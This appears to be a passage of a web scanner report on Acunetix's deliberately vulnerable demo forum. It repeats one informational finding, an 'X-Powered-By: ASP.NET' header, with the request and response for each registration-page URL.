<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 402 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3673 |
| Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/robots.txt |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 216 bytes. |
GET http://testasp.vulnweb.com/robots.txt HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 245 bytes. |
HTTP/1.1 200 OK
